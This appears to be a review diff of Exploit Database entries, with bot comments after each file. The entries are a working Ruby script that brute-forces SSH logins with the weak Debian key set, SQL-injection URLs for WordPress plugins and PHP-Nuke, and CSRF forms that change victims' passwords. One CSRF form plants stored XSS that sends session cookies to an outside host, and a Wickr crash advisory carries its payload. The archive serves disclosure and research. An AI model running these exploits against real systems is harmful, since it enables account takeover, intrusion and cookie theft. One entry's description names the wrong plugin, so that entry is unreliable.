# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
# debian_openssh_key_test.rb <host> <user> <keydir>
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
threads = []
keyfiles = []
host = ARGV.shift or raise "no host given!"
user = ARGV.shift or raise "no user given!"
keysdir = ARGV.shift or raise "no key dir given!"
Dir.new(keysdir).each do |f|
if f =~ /\d+$/ then
keyfiles << f
queue << f
end
end
totalkeys = queue.length
currentkey = 1
THREADCOUNT.times do |i|
threads << Thread.new(i) do |j|
while !queue.empty?
keys = []
KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
keys.map! { |f| f = File.join(keysdir, f) }
keys.each do |k|
puts "testing key #{currentkey}/#{totalkeys} #{k}..."
currentkey += 1
end
system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
if $? == 0 then
keys.each do |k|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
if $? == 0 then
puts "KEYFILE FOUND: \n#{k}"
exit
end
end
end
end
end
end
trap("SIGINT") do
threads.each { |t| t.exit() }
exit
end
threads.each { |t| t.join }
# milw0rm.com [2008-05-16]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67535/info
Search Everything plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Booking System (Booking Calendar) 1.3 are vulnerable.
www.example.com/wp/wp-admin/admin-ajax.php?action=dopbs_show_booking_form_fields&booking_form_id=[SQLi]
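Review bot: the opening sentence names the "Search Everything plugin for WordPress", but the affected-versions line, the request (action=dopbs_show_booking_form_fields, booking_form_id) and the files.csv row all concern the Booking System (Booking Calendar) plugin; the first sentence appears to be carried over from a different BID and should be corrected.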


@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/67604/info
User Cake is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
User Cake 2.0.2 is vulnerable; prior versions may also be affected.
<html>
<! -- CSRF Example for userCake -->
<div align="center">
<pre>
<h2><b> userCake CSRF Proof of concept <b></h2>
<h4> Prerequisite: Make sure the user is logged in to the forum before submitting </h4>
<body>
<form
action="http://usercake.com/user_settings.php"
method="POST">
Enter <u>CSRFTest</u> user account password to continue...
Username: <b>CSRFTest</b>
Password: <input type="password" name="password" size="10" required>
<input type="hidden" name="email" value="attacker@email.com" />
<input type="hidden" name="passwordc" value="HelloWorld" />
<input type="hidden" name="passwordcheck" value="HelloWorld" />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</div>
</html>
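Review bot: the markup is malformed: `<! -- CSRF Example for userCake -->` is not a valid HTML comment (no space is allowed after `<!`), `<div>`, `<pre>` and the headings precede `<body>`, `<pre>` is never closed, and the `<b>` in the h2 is closed with a second `<b>`. Browsers will still render the form, but the file should be valid if it is to serve as a test case. More importantly, the form requires the victim to type the CSRFTest account password, which contradicts the description's claim that requests are not validated; the write-up should state whether user_settings.php enforces the current password, since that materially limits the issue.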


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/67656/info
PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP-Nuke 8.3 is vulnerable; other versions may also be affected.
http://www.example.com/modules.php?name=Submit_News&subject=whatever&topics[]=[SQLi]

platforms/php/webapps/39202.txt Executable file

@ -0,0 +1,65 @@
#Product : WP Symposium Pro Social Network plugin
#Exploit Author : Rahul Pratap Singh
#Home page Link : https://wordpress.org/plugins/wp-symposium-pro
#Version : 15.12
#Website : 0x62626262.wordpress.com
#Twitter : @0x62626262
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 8/Jan/2016
1) XSS Vulnerability:
Vulnerable Code:
file: wps_usermeta_shortcodes.php
"wpspro_country" parameter is not sanitized, that leads to persistent xss.
Video Demonstration:
https://www.youtube.com/watch?v=Xglc3rNZPXs
2) CSRF Vulnerability:
Description:
Edit profile page is vulnerable to CSRF, that allows to change password
which in turn leads to full account takeover.
Exploit:
<html>
<body>
<form action="http://localhost/wp422/wordpress/index.php/edit-profile/"
method="POST" enctype="multipart/form-data">
<input type="hidden" name="wps&#95;usermeta&#95;change&#95;update"
value="yes" />
<input type="hidden" name="wpspro&#95;display&#95;name" value="rahul"
/>
<input type="hidden" name="wpspro&#95;firstname" value="hello1" />
<input type="hidden" name="wpspro&#95;lastname" value="hello2" />
<input type="hidden" name="wpspro&#95;email" value="&#13;" />
<input type="hidden" name="wpsro&#95;home" value="hello4" />
<input type="hidden" name="wpspro&#95;country" value="hello5" />
<input type="hidden" name="wpspro&#95;password" value="asdf" />
<input type="hidden" name="wpspro&#95;password2" value="asdf" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Video Demonstration:
https://www.youtube.com/watch?v=sN65HlCRe9c
Fix:
Update to version 16.1
Disclosure Timeline:
reported to vendor : 6/1/2016
vendor response : 6/1/2016
vendor acknowledged : 6/1/2016
vendor scheduled a patch: 7/1/2016
CVE Number : Not assigned yet
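Review bot: the "Vulnerable Code:" section names wps_usermeta_shortcodes.php but shows no code, so the claim that wpspro_country is unsanitised cannot be checked from the advisory; quote the relevant lines. In the CSRF form, the field `wpsro&#95;home` lacks the `p` that every other field's `wpspro_` prefix has, which looks like a typo that would make that field ignored, and `wpspro_email` is set to a bare carriage return (`&#13;`) without explanation. The disclosure timeline uses day/month order ("6/1/2016") while the header reads "8/Jan/2016"; use one unambiguous format.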


@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/67610/info
Pyplate is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
Pyplate 0.08 Beta is vulnerable; other versions may also be affected.
<html>
<body>
<form action="http://www.example.com/admin/addScript.py"; method="POST">
<input type="hidden" name="title"
value="<script>new&#32;Image&#40;&#41;&#46;src&#61;"http&#58;&#47;&#47;bugs&#46;fi&#47;evil&#46;py&#63;cookie&#61;"&#32;encodeURI&#40;document&#46;cookie&#41;&#59;<&#47;script>"
/>
<input type="hidden" name="file" value="bugs" />
<input type="hidden" name="category" value="&#47;" />
<input type="hidden" name="post" value="<p>bugs<&#47;p>&#13;&#10;" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="new" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
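Review bot: the form tag has a stray semicolon after the action attribute (`action="http://www.example.com/admin/addScript.py"; method="POST"`), which is invalid HTML; remove it. The title value carries a script tag, so the PoC combines CSRF with stored XSS in the created post, which neither the description nor the files.csv row ("Cross Site Request Forgery Vulnerability") reflects; say so, since it changes the impact assessment.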


@ -1,234 +0,0 @@
Document Title:
===============
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1377
Video:
http://www.vulnerability-lab.com/get_content.php?id=1388
Release Date:
=============
2014-12-25
Vulnerability Laboratory ID (VL-ID):
====================================
1377
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder`
which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage
the data, a practice which is prone to error according to many security experts.
On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition,
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.
(Copy of the Homepage: https://wickr.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a denial of service web vulnerability in the offical Wickr Desktop v2.2.1 windows software.
Vulnerability Disclosure Timeline:
==================================
2014-12-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wickr Inc.
Product: Wickr - Desktop Software (Windows) 2.2.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) windows software.
The issue allows local attackers to crash or shutdown the software client by usage of special crafted symbole payloads.
The wickr v2.2.1 (msi) software crashs with unhandled exception in the CFLite.dll by the qsqlcipher_wickr.dll when processing to include
special crafted symbole strings
as password or name. The issue occurs after the input of the payload to the `change name friend contacts`-, `the wickr password auth`-
and the `friends > add friends` input fields. Attackers are able to change the name value of the own profile (payload) to crash the
wickr client. Local attackers can include the payload to the input fields to crash/shutdown the application with unhandled exception.
The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of
the vulnerability results in an application crash or service shutdown.
Vulnerable Module(s):
[+] friend contacts
[+] wickr password auth
[+] friends
Vulnerbale Input(s):
[+] add friends (name)
[+] wickr password auth
[+] change friend (update name)
Vulnerable Parameter(s):
[+] name (value input)
[+] password (vale input)
Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download Wickr v2.2.1 for windows to your windows 8 box (mywickr.info/download.php?p=4)
2. Install the wickr windows version of the software to your windows 8 box
3. Create an new account and include the payload to the password input field
Note: After the payload has been processed to the auth, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the first issue!
5. We register a new account with regular values
6. Open the friends > add friends section and include the payload to the search input value
Note: After the payload has been processed to add the friend, the software crashs. You should attach a debugger ago.
7. Successful reproduce of the second issue!
8. We open the software again and login. Switch to the existing friends contacts and edit the profile
9. Include in the name values the payload and save the settings
Note: After the payload has been processed to change to the name, the software crashs. You should attach a debugger ago.
4. Successful reproduce of the third issue!
Payload: Denial of Service
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็
--- Error Report Logs ---
EventType=APPCRASH
EventTime=130628671359850105
ReportType=2
Consent=1
UploadTime=130628671360390638
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
WOW64=1
NsAppName=Wickr.exe
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
Response.BucketTable=1
Response.LegacyBucketId=73726044048
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=0.0.0.0
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=02849d78
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=53f6c178
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=5861
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=84a0
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
UI[3]=Wickr.exe funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
... ... ... ...
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Wickr.exe
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
NsPartner=windows
NsGroup=windows8
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE
Security Risk:
==============
The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
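Review bot: this is a pure deletion (the header reads -1,234 +0,0) with no replacement shown, so the index row that references this advisory's path must be updated in the same commit or it will point at a missing file; worth confirming before merge. If the file is being kept elsewhere, the text it carries has inconsistencies a maintainer may want to fix there: "Exploitation Technique: Local" conflicts with the PoC section's claim that the issue "can be exploited by remote attackers and local attackers", the reproduction steps number the final item "4." after step 9, and the description blames "the qsqlcipher_wickr.dll" for the exception while the attached report lists that library only as LoadedModule[103] and names CFLite.dll as the faulting module (Sig[3].Value=CFLite.dll, exception code c0000005), so the attribution to the SQLCipher driver is not supported by the log shown.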